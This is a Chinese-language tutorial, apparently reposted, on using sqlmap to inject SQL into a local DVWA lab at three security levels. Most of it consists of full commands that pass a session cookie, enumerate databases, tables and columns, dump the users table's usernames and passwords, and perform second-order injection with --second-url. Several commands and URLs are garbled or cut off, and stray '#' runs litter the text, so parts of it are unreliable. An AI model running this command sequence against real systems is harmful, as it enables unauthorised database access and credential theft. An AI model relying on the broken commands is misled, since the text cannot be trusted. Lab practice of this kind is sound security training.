首頁 > 運維 > 安全 > 主體

Sqlmap自動化注入的範例分析

WBOY
發布: 2023-05-13 15:31:13
轉載
1167 人瀏覽過

使用sqlmap對dvwa進行自動化注入
 設定dvwa等級為low

  1. #開啟dvwa的SQL Injection(SQL Injection (Blind) ),開啟瀏覽器偵錯,輸入user id並submit,以查看攔截到的請求。

  2. 可以看到是一個GET請求,url「http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#」

  3. 我們直接放到salmap測試一下,用-u指令 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit# "

  4. 可以看到這裡是需要登入的,否則跑不出來。所以我們需要加入一個cookie維持登入

    6.使用burp suite代理程式抓包,取得登入的cookie,新增--dbs 爆資料 -u "http:// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --    cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low"#mycoo

##      7. 我們使用-D xxx指定檢視的資料庫,用--tables檢視該資料庫的所有表格:-u            "http://192.168.1.222:8089/vul  "http://192.168.1.222:8089/vulultiabilities/i/mitid Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

查看跑出來的結果:

#8.我們用-D xxx -T ttt指定檢視的表,用--columns查看表的列

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9.我們用-D xxx查看資料庫, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的資料

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu666rtp07 -D dvwa -T users -C password,user --dump

    #將dvwa安全等級調至medium將抓取的資料包儲存為.txt文件,放到sqlmap的目錄下,直接-r 檔名--dbs(後續的參數自己加即可)

  • 將dvwa 安全等級調至high。由於這次的提交頁面跟回傳結果的頁面不是同一個頁面,所以之前的那種方法在這裡不能用了。要使用二階注入的方法

  • 提交資料的網址
  •              

  • 返回的網址

#       將抓取的封包儲存為.txt文件,放入sqlmap的目錄下,爆炸資料庫,指令: -r           1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --  sql   level 2 --dbs

       

              爆炸表名

  • ##-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -        -batch --level 2 -D dvwa --tables

          
  •       爆列名
          

  • -r 1. "http://192.168.1.222:8089/vulnerabilities/sqli/" 

  •      -- batch --level 2 -D dvwa -T user --columns###### ######     ############     爆字段資料############   #######-r 1.txt --second-url " http://192.168.1.222:8089/vulnerabilities/sqli/" --       batch --level 2 -D dvwa -T users -C user,password --dump############ #### ################一些概念問題:######################二階注入:二階### ###sql注入--second-order有些時候注入點輸入的資料看回傳結果的時候並不是目前的頁面,而是另外的一個頁面, 這時候就需要你指定到哪個頁面取得回應判斷真假。 –second-url 後面跟著一個回傳的頁面的URL位址###################--batch:自動預設配置,不用手動按yes or no##### #
  • level :Sqlmap一共有5個探測等級,預設是1。等級越高,表示偵測時使用的payload也越多。其中5級的payload最多,會自動破解出cookie、XFF等頭部注入。當然,等級越高,偵測的時間也越慢。這個參數會影響測試的注入點,GET和POST的資料都會進行測試,HTTP cookie在level為2時就會測試,HTTP  User-Agent/Referer頭在level為3時就會測試。在不確定哪個參數為注入點時,為了確保準確性,建議設定level為5(速度也隨之變慢)

#

以上是Sqlmap自動化注入的範例分析的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
來源:yisu.com
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板